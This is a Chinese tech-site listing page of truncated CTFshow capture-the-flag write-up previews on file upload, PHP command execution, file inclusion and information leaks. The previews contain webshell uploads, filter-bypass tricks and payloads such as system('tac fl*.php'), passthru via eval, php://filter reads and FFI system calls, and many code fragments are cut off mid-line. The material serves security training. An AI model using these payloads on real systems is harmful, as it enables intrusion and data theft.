E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
CTFSHOW
ctfshow
-文件上传(web151-web161)
目录web151web152web153web154web155web156web157web158web159web160web161web151提示前台验证不可靠那限制条件估计就是在前端设置的上传php小马后弹出了窗口说不支持的格式查看源码这一条很关键这种不懂直接ai搜意思就是限制了上传类型允许的后缀格式为png我们直接修改并且上传小马给出了上传路径访问传参即可得出flag方法二因为是前端验证
网安小t
·
2024-02-13 09:26
CTFSHOW
文件上传
网络安全
渗透测试
文件上传
文件上传漏洞
php代码
CTFshow
web(php命令执行 50-54)
web50/dev/null2>&1");}}else{highlight_file(__FILE__);}做题之前先给大伙献上干货。1.绕过cat使用:tacmorelessheadtactailnlod(二进制查看)vivimsortuniqrev2.绕过空格用:%09/dev/null2>&1");其实就是将内容写入黑洞的意思,你的命令执行内容被带走了,所以这里使用命令分割||(只执行h前面
补天阁
·
2024-02-13 08:33
前端
php
CTFshow
web安全
CTFshow
web(php命令执行 55-59)
web55|\|\|\<|\.|\,|\?|\*|\-|\=|\[/i",$c)){system("cat".$c.".php");}}else{highlight_file(__FILE__);}这里一句话:其实就是构造出36问题是过滤了数字的情况下怎么弄出36那就回到了无回显RCE问题了原理是:${_}=""$((${_}))=0$((~$((${_}))))=-1然后拼接出-36再进行取反/
补天阁
·
2024-02-13 08:02
php
开发语言
CTFShow
web安全
【
CTFshow
】VIP题目限免 通关
博主介绍博主介绍:大家好,我是hacker-routing,很高兴认识大家~✨主攻领域:【渗透领域】【应急响应】【python】【VulnHub靶场复现】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!目录前言源码泄露前台JS绕过协议头信息泄露robots后台泄露phps源码泄露源码压缩包泄露版本控制
hacker-routing
·
2024-02-12 00:29
web
CTF夺旗赛
安全
web安全
linux
vulnhub
CTF
网络安全
ctfshow
CTFshow
-WEB入门-信息搜集
web1(查看注释1)wp右键查看源代码即可找到flagweb2(查看注释2)wp【Ctrl+U】快捷键查看源代码即可找到flagweb3(抓包与重发包)wp抓包后重新发包,在响应包中找到flagweb4(robots协议)wp先访问robots.txt,得到线索进而访问flagishere.txt,获得flagweb5(phps源码泄露)wp访问index.phps获得泄露文件打开文件获得fla
晴友读钟
·
2024-02-11 22:10
CTFweb
ctf
ctfshow
ctfshow
——命令执行
文章目录web29——通配符*绕过web30——调用其他命令执行函数web31——参数逃逸web32-web36——配合文件包含+伪协议web37-web39——文件包含web40——web29——通配符*绕过i不区分大小写,直接?c=system('tacfl*.php');web30——调用其他命令执行函数调用其他代码执行函数,如shell_exec,该函数需要输出。payload:?c=ec
PT_silver
·
2024-02-11 00:46
渗透测试实践
网络安全
web安全
ctfshow
web入门 1-2 +密码签到
web1F12源代码web2ctrl+ucypto签到a='}wohs.ftc{galf'print(a[::-1])
_Nickname
·
2024-02-10 13:15
网络安全
CTFshow
5——23
flagmisc6和misc5一样(推测:可能是jpg这种看得见的图片,用winhex)misc7misc8前置工具安装这里可以看看见两个png然后我们在我们的文件夹里面有个output文件里面就有分离出来的图片
ctfshow
_Nickname
·
2024-02-10 13:14
linux
运维
服务器
ctfshow
misc入门 misc24-31
打开发现校验码错误2-7修改图片下面长度,直接拉到最大misc26我直接开到最大,有了这些代码出处importosimportbinasciiimportstructcrcbp=open("D:\CTF\题目\
CTFshow
_Nickname
·
2024-02-10 13:14
网络安全
python
ctfshow
-命令执行(web73-web77)
web73用不了上一题的通用poc了因为禁用了strlen但是可以改一个函数自定义一个函数只要是能实现strlen效果即可c=var_export(scandir('/'));exit(0);根目录下有一个flagc.txt文件c=include('/flagc.txt');exit(0);web74禁用了scandir函数那就使用web72的glob协议查看目录下文件直接包含这个文件web75和
网安小t
·
2024-02-10 11:52
命令执行
CTFSHOW
命令执行
PHP
渗透测试
ctfshow
ctfshow
-命令执行(web118-web122)
web118是一个窗口查看源码发现是system($code)命令执行经过测试禁用了很多东西很多很多$IFS可以思路就是使用系统变量构造我需要的poc这些都是系统的环境变量这是答案${PATH:~A}${PWD:~A}$IFS????.???解释一下PATH变量输出结尾一般都是n因为网站默认根目录为/var/www/html所以${PWD:~A}取值就是l题目还提示flag在flag.php中所以
网安小t
·
2024-02-10 11:22
命令执行
CTFSHOW
前端
渗透测试
ctfshow
网络安全
CTFSHOW
命令执行web入门29-54
description:>-这里就记录一下
ctfshow
的刷题记录是web入门的命令执行专题里面的题目,他是有分类,并且覆盖也很广泛,所以就通过刷这个来,不过里面有一些脚本的题目发现我自己根本不会笑死。
22的卡卡
·
2024-02-09 16:01
GITBOOK
CTFSHOW
命令执行
CTF
web
CTF秀
ctfshow
WEB入门 web1-10 wp精讲
目录web1_查看源码web3_抓包web4-9_目录文件web10_cookieweb1_查看源码ctrl+u查看源码web3_抓包查看源码,无果抓包,找到flagweb4-9_目录文件GitHub-maurosoria/dirsearch:Webpathscanner下载dirsearch工具扫一下就都出来了web4-9的信息泄露点/robots.txt/index.phps/www.zip/
徐小潜
·
2024-02-09 11:00
#
Web
网络安全
经验分享
安全
web安全
学习方法
笔记
ctfshow
-web21~28-WP
爆破(21-28)web21题目给了一个zip文件,打开后解压是爆破的字典,我们抓包一下网址看看发现账号和密码都被base64了,我们发送到intruder模块,给爆破的位置加上$符圈住去base64解码一下看看格式
五行缺你94
·
2024-02-09 08:48
各大CTF平台WP
java
数据库
android
ctf
CTFshow
web(php命令执行 45-49)
基础知识:1.绕过cat使用:tacmorelessheadtactailnlod(二进制查看)vivimsortuniqrev2.绕过空格用:%09/dev/null2>&1");}}else{highlight_file(__FILE__);}这里system($c.">/dev/null2>&1");就是把内容写入黑洞的意思。||是可以进行命令分割的,意思是只会执行前面的命令,所以直接?c=
补天阁
·
2024-02-09 07:37
前端
php
java
CTFshow
web安全
CTFshow
web(命令执行 41-44)
web41额,这里直接就给禁止所有字母和数字,其实看到这种全过滤,反倒是只有一种解法,就是构造字符串&按位与|按位或^按位异或~取反为四大位运算符,其中按位异|没有过滤,过滤的字符是防异或、自增和取反构造字符根据羽师傅的脚本:=32&ord($c)/dev/null2>&1");}else{highlight_file(__FILE__);}典型的双写绕过,因为system($c.">/dev/n
补天阁
·
2024-02-09 07:35
前端
android
CTFshow
web安全
CTFshow
web(命令执行29-36)
?c=eval($_GET[shy]);­=passthru('catflag.php');#逃逸过滤?c=include%09$_GET[shy]?>­=php://filter/read=convert.base64-encode/resource=flag.php#文件包含?c=include%0a$_GET[cmd]?>&cmd=php://filter/read=conver
补天阁
·
2024-02-08 15:48
前端
CTFshow
web安全
CTFshow
web(php命令执行 37-40)
?c=eval($_GET[shy]);­=passthru('catflag.php');#逃逸过滤?c=include%09$_GET[shy]?>­=php://filter/read=convert.base64-encode/resource=flag.php#文件包含?c=include%0a$_GET[cmd]?>&cmd=php://filter/read=conver
补天阁
·
2024-02-08 15:17
前端
php
android
CTFshow
web安全
ctfshow
-web11~20-WP
web11根据提示,查询对
ctfshow
域名进行dns查询,查看TXT记录阿里云查询链接:阿里云网站运维检测平台获取flag成功web12根据题目提示,我们访问robots.txt,获取到后台地址然后我们访问一下后台
五行缺你94
·
2024-02-07 13:20
各大CTF平台WP
web安全
ctf
CTFshow
web(php特性129-132)
web1290){echoreadfile($f);}}知识点:PHPreadfile()函数PHPFilesystem函数定义和用法readfile()函数输出一个文件。该函数读入一个文件并写入到输出缓冲。若成功,则返回从文件中读入的字节数。若失败,则返回false。您可以通过@readfile()形式调用该函数,来隐藏错误信息。语法readfile(filename,include_path,
补天阁
·
2024-02-07 08:11
php
开发语言
ctfshow
web安全
CTFshow
web(php特性125-128)
web125代码解析:1.CTF_SHOW存在2.CTF_SHOW.COM存在3.POST:fl0g=flag_give_me4.fun不能匹配到特殊符号且小于16前面两个好说,第三第四个有点难度,因为第三个看你什么打法,题目只要求不存在f10g而已的,看你什么打法的意思是你在哪弄出flag,是在eval("$c".";");顶着一堆恐怖的过滤进行命令执行拿到flag还是在满足三个flag情况下直
补天阁
·
2024-02-07 08:10
前端
php
android
ctfshow
web安全
CTFshow
web入门web125-php特性28
初始化界面:通过分析代码可知:var_dump()被过滤,但是还有var_export()函数,该函数与var_dump函数功能类似:fun=var_export(get_defined_vars())&CTF_SHOW=1&CTF[SHOW.COM=1
郭与童
·
2024-02-06 04:54
php
ctfshow
php特性 web89-web115 web123-150wp
php特性参考博客仍然是南神博客文章目录php特性web89web90web91web92web93web94web95web96web97web98web99web100web101web102web103web104web105web106web107web108***web109***web110web111web112web113web114***web115web123web125***
是Mumuzi
·
2024-02-06 04:22
ctf
笔记
ctfshow
php
信息安全
ctfshow
--web入门(web101--web115&web123&web125-web133)
ctfshow
–web入门(web101–web115&web123&web125-web133)web101call_user_func():把第一个参数作为回调函数使用,后面的参数是这个函数的参数。
Q1ng_chuan
·
2024-02-06 04:21
web
php
学习
学习方法
笔记
ctfshow
学习记录-web入门(php特性109-115&123&125-126)
目录web109web110web111web112web113web114web115web123web125web126web109解答:正则匹配要求v1和v2要包含字母。题目中eval里的语句,和之前web101有点相似。初始化$v1,v1是个类,$v2()是参数。这道题用到了魔术方法__toString(),不少php的内置类里都包含有这个方法,如Reflectionclass、Excep
九枕
·
2024-02-06 04:51
#
ctfshow-web
ctf-web
php
学习
前端
CTFshow
web(php特性109-112)
web109代码分析:使用正则表达式函数preg_match()来检查变量$v1和$v2是否包含至少一个字母。如果两者都满足条件,则执行eval()函数,将$v2()执行的结果作为参数创建一个新的$v1类对象,并通过echo输出。思路:既然题目没有告诉我flag在哪,那我肯定要v2=system(ls)啊,这是每道题目都通用的思路知识点:异常处理逻辑当在PHP代码中出现错误时,可以使用异常处理机制
补天阁
·
2024-02-06 04:50
PHP特性
CTF赛事与题目
php
开发语言
ctfshow
web安全
CTFshow
web(php特性113-115&123)
web113这里开始小小审计一下代码代码分析:记住!!!!!不管什么类型的PHP过滤题目,最最最重要的就一点,搞清楚我要干啥!搞清楚我要干啥!搞清楚我要干啥!重要的事说三遍!根据代码逻辑,对于获取flag的条件,需要满足以下几个条件:CTF_SHOW必须存在CTF_SHOW.COM必须存在fun不能包含特殊字符fun值必须小于等于18$fl0g必须等于"flag_give_me"如果看不出来这个,
补天阁
·
2024-02-06 04:18
php
开发语言
ctfshow
web安全
CTFshow
web(php特性 105-108)
web105$value){if($key==='error'){die("whatareyoudoing?!");}$$key=$$value;}foreach($_POSTas$key=>$value){if($value==='flag'){die("whatareyoudoing?!");}$$key=$$value;}if(!($_POST['flag']==$flag)){die($e
补天阁
·
2024-02-05 17:35
CTF赛事与题目
PHP特性
ctfshow
php特性
web安全
ctfshow
web-76
开启环境:c=?>__toString().'');}exit(0);?>c=include("/flagc.txt");exit();c=?>__toString().'');}exit(0);?>c=try{$dbh=newPDO('mysql:host=localhost;dbname=ctftraining','root','root');foreach($dbh->query('sele
郭与童
·
2024-02-04 07:16
前端
ctfshow
web-77
开启环境:先直接用伪协议获取flag位置。c=?>__toString().'');}exit(0);?>发现flag36x.txt文件。同时根目录下还有readflag,估计需要调用readflag获取flag。c=$ffi=FFI::cdef("intsystem(constchar*command);");$a='/readflag>1.txt';$ffi->system($a);访问1.t
郭与童
·
2024-02-04 07:13
前端
php
ctfshow
——文件包含
文章目录web78——php伪协议第一种方法——php://input第二种方法——data://text/plain第三种方法——远程包含(http://协议)web78——str_replace过滤字符`php`第一种方法——远程包含(http://协议)第二种方法——data://,php短标签web78——php伪协议第一种方法——php://input这里不知道flag.php的文件路径
PT_silver
·
2024-02-03 20:24
渗透测试实践
网络
CTFshow
web(php特性97-100)
web97突然想起这些知识点我之前的文章都介绍过,如果想要系统学习:PHP强相等&弱相等(附带科学计数法)_php科学计数法-CSDN博客这里强等于就主流一个绕过数组绕过POSTa[]=1&b[]=2web98这里其实就是三目运算符的知识点:格式:a?b:c(a对的就执行b,反之则执行c)那就把$_GET?$_GET=&$_POST:'flag';这里随便传个参数啥的对可以,因为GET上传了参数后
补天阁
·
2024-02-03 18:49
php
开发语言
ctfshow
web安全
CTFshow
web(php特性93-96)
web93
补天阁
·
2024-02-03 18:19
PHP特性
CTF赛事与题目
前端
php
开发语言
ctfshow
web安全
CTFshow
web(php特性89-92)
web89
补天阁
·
2024-02-03 18:48
PHP特性
前端
web
php特性
ctfshow
day38 XSS跨站&绕过修复&http_only&CSP&标签符号
XSS绕过-
CTFSHOW
-361到331关卡绕过WP前言:document.cookie//获取当前浏览器cookie信息windows.location.her="xxxx.com'去访问目标网站GET.PHP
匿名用户0x3c
·
2024-02-03 09:21
小迪网安笔记
安全
day38WEB攻防-通用漏洞&XSS跨站&绕过修复&http_only&CSP&标签符号
pwd=6oa3提取码:6oa3XSS绕过-
CTFSHOW
-316到331关卡绕过WPxss绕过总结:https://xz.aliyun.com/t/406731
aozhan001
·
2024-02-03 09:19
小迪安全-2022年
xss
前端
CTFSHOW
-文件上传
目录大体思路WEB151WEB152WEB153WEB154web155web156web157、158web159web160web161WEB162WEB163WEB164WEB165WEB166WEB167WEB168WEB169WEB170杂记大体思路图片木马原理:图片木马以文件上传漏洞为基本条件,将可执行的脚本写入到图片中去,再利用文件包含漏洞来执行图片中的一句话木马,从而获取目标服务器
_Monica_
·
2024-01-31 20:14
CTFSHOW
安全漏洞
网络安全
信息安全
安全基础~通用漏洞3
文章目录知识补充文件上传(1)
ctfshow
文件上传靶场练习150-161文件上传(2)
ctfshow
文件上传靶场练习162-170文件上传总结文件包含知识补充url编码:0a换行;20空格;3c左尖括号
`流年づ
·
2024-01-31 20:14
安全学习
安全
ctfshow
web71
开启环境:c=?>__toString().'');}exit(0);?>c=include("/flagc.txt");exit();
郭与童
·
2024-01-30 17:58
java
android
开发语言
php
CTFSHOW
web6
进入题目,发现页面和之前的web2一样,试试看万能密码登陆:username=admin'or1=1#&password=123不出所料,万能钥匙还是被ban了,试试看过滤了什么测试发现,题目过滤了空格,那么我们就用/**/来绕过空格:username=admin'/**/or/**/1=1#&password=123发现可以成功登陆,接下来老方法,测试有几个数据库:username=admin'
cng_Capricornus
·
2024-01-30 17:58
ctfshow
web安全
CTFShow
Web12
先打开靶机,看到下面的网站,发现啥都点不了,所有按钮都没有实际的动作:根据没啥思路就抓个包,扫描个路径的原则:可以看到有robots.txt,访问之:得到关键提示路径:/admin/,访问之后出现提示框,要求输入账号和密码,账号显然是admin,密码是网页底部那一串奇怪的数字:输入即可得到flag。这里写一点小小的心得:因为使用dirsearch的时候比较慢,可以将CTF中常用的路径放到字典的前面
燕绥520
·
2024-01-30 17:28
CTF
Web
web安全
CTFShow
Web4
CTFShowWeb4从题干中可以获得关键提示:总有人把后台地址写入robots,帮黑阔大佬们引路。关于robots.txt:robots.txt文件是一个文本文件,使用任何一个常见的文本编辑器,比如Windows系统安装了Notepad,就可以创建和编辑它[1]。robots.txt是一个协议,而不是一个命令。robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。robots.txt
燕绥520
·
2024-01-30 17:58
CTF
Web
搜索引擎
web安全
CTFshow
Web入门 爆破
web21账户是admin爆破密码web22题目中给了flagweb23写脚本:";echo$t;break;}}}highlight_file(__FILE__);?>web24Linuxversion5.4.0-126-generic(buildd@lcy02-amd64-072)(gccversion9.4.0(Ubuntu9.4.0-1ubuntu1~20.04.1))#142-Ubunt
一夜至秋.
·
2024-01-30 17:57
CTF
web安全
ctfshow
web72
下载源码:开启环境:本题设置了open_basedir(),将php所能打开的文件限制在指定的目录树中,包括文件本身。因为ini_set()也被限制了,所以open_basedir()不能用ini_set()重新设置绕过。使用php伪协议glob://c=?>__toString().'');}exit(0);?>不加前面?>”结尾来结束语句,但是eval里的“?>”不会闭合当前php文件。
郭与童
·
2024-01-30 17:24
android
android
studio
ide
CTFSHOW
——misc
misc1图片就是答案
ctfshow
{22f1fb91fc4169f1c9411ce632a0ed8d}misc2打开就是png文件,更改一下后缀跟着学了下pythyon图片提取importpytesseractfromPILimportImage
_Nickname
·
2024-01-29 05:49
网络安全
红包六(
CTFshow
)
jar的逆向,第一次接触jd逆向工具反编译jar文件可以直接丢进去看,也可以用jd反汇编工具看这里提示flag不在这里分析一下这段代码1.引入必要的库:java.util.Base64:用于处理Base64编码和解码。java.util.Scanner:用于从用户输入中读取文本。javax.crypto.Cipher:用于加密和解密操作。javax.crypto.spec.SecretKeySpe
Back~~
·
2024-01-29 04:51
CTF混合
学习
ctfshow
web71
前置知识点:ob_get_contents():得到输出缓冲区的内容。ob_end_clean():清除缓冲区的内容,并将缓冲区关闭,但不会输出内容。preg_replace():执行一个正则表达式的搜索和替换。exit():输出一个消息并且退出当前脚本。下载源码打开:开启环境:c=var_export(scandir("/"));exit();c=include("/flag.txt");exi
郭与童
·
2024-01-28 13:45
前端
javascript
开发语言
php
ctfshow
web75
开启环境:先直接用伪协议获取flag位置c=?>__toString().'');}exit(0);?>c=try{$dbh=newPDO('mysql:host=localhost;dbname=ctftraining','root','root');foreach($dbh->query('selectload_file("/flag36.txt")')as$row){echo($row[0]
郭与童
·
2024-01-28 13:12
android
php
CTFshow
元旦水友赛web部分题解
1.easy_include看题目是一个文件包含题post的内容被过滤掉.,而且开头必须是字母,但是如果想要文件包含需要file:///xxxx,这里开头就是/了,所以需要绕过,file伪协议可以用file://localhost+路径让绕过开头必须是字母。可以看到能读取到文件,读取一些配置文件无果,尝试用pear文件包含get传参/?+config-create+/&/+/var/www/htm
zmjjtt
·
2024-01-27 17:58
CTF
前端
网络安全
web安全
ctf
ctfshow
--node.js漏洞
一些漏洞:危险函数所导致的命令执行eval()eval()函数可计算某个字符串,并执行其中的的JavaScript代码。和PHP中eval函数一样,如果传递到函数中的参数可控并且没有经过严格的过滤时,就会导致漏洞的出现。简单例子:main.jsvarexpress=require("express");varapp=express();app.get('/eval',function(req,re
ing_end
·
2024-01-27 06:09
笔记
node.js
bash
linux
上一页
1
2
3
4
5
6
7
8
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他